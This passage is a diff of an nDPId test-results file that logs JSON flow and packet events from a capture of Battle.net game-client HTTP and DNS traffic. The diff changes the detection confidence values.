00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1437389985363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985363,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEahAAIAGHBLAqAFkUO+6Gg3DAFAjjlJ7coYX6VAQ+vDZQQAA"} -00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/live-event?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1437389985376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985376,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcQgMkzhJxiSeGASOQhdQAAAAgQFtAAA"} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1437389985376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985376,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEapAAIAGHBDAqAFkUO+6Gg3EAFAnGJJ4IDJM4lAQ+vCzFAAA"} -00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985320,"flow_last_seen":1437389985385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/feed\/homepage?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985434,"flow_last_seen":1437389985434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985434,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1437389985434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985434,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOhAAIAGLLjAqAFkUO+6KA3FAFDb6m0AAAAAAIACIAAq7AAAAgQFtAEDAwgBAQQC"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985446,"flow_last_seen":1437389985446,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985446,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1437389985446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985446,"pkt":"hCYVPnXEIImEa8W6CABFAAA0AOlAAIAGLLfAqAFkUO+6KA3GAFDf523sAAAAAIACIAAmAgAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1437389985486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985486,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcUKff272+ptAWASOQgysAAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1437389985486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAOxAAIAGLMDAqAFkUO+6KA3FAFDb6m0BCn39vFAQ+vCIhAAA"} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985434,"flow_last_seen":1437389985495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985495,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/live-events.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1437389985499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985499,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGeqhQ77oowKgBZABQDcb00A3Z3+dt7WASOQgzVQAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1437389985499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985499,"pkt":"hCYVPnXEIImEa8W6CABFAAAoAO5AAIAGLL7AqAFkUO+6KA3GAFDf523t9NAN2lAQ+vCJKQAA"} 
-00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985446,"flow_last_seen":1437389985508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1437389985508,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.battle.net","url":"eu.battle.net\/sc2\/en-gb\/data\/client-homepage.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1437389985821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1437389985821,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2kAAIARVovAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1437389985852,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1437389985852,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2oAAIARVorAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1437389985882,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1437389985882,"pkt":"IImEa8W6hCYVPnXECABFAAC0AABAAEARtYbAqAH+wKgBZAA12KwAoDk1miuBgAABAAQAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQABwAwABQABAAAAGwAlC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAllZGdlc3VpdGXAIcA2AAUAAQAAUvQAEQVhMTk2MQFnBmFrYW1hacAhwGcAAQABAAAAEwAEAuQucMBnAAEAAQAAABMABALkLms="} 
-00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389985821,"flow_last_seen":1437389985882,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1437389985882,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.228.46.112"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389985821,"flow_last_seen":1437389985882,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1437389985882,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.228.46.112"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985891,"flow_last_seen":1437389985891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985891,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1437389985891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985891,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN5AAIAG2oXAqAFkAuQucA3HAFCKhzd4AAAAAIACIACLmQAAAgQFtAEDAwgBAQQC"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985892,"flow_last_seen":1437389985892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985892,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -222,7 +222,7 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1437389985923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOJAAIAG2oHAqAFkAuQucA3LAFDKy4tMAAAAAIACIAD3fAAAAgQFtAEDAwgBAQQC"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1437389985923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDccmQrPVioc3eYASOQiYawAAAgQFtAEBBAIBAwMF"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1437389985923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLONAAIAG2ozAqAFkAuQucA3HAFCKhzd5JkKz1lAQAQARRAAA"} 
-00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOVAAIAG2n7AqAFkAuQucA3MAFCmW5TdAAAAAIACIAASWwAAAgQFtAEDAwgBAQQC"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -233,85 +233,85 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1437389985929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985929,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOhAAIAG2ofAqAFkAuQucA3JAFBxSWFd4DDjTFAQAQAXNwAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1437389985930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985930,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcrPCIDOdHB\/2oASOQjwXgAAAgQFtAEBBAIBAwMF"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1437389985930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985930,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOlAAIAG2obAqAFkAuQucA3KAFB0cH\/azwiAz1AQAQBpNwAA"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 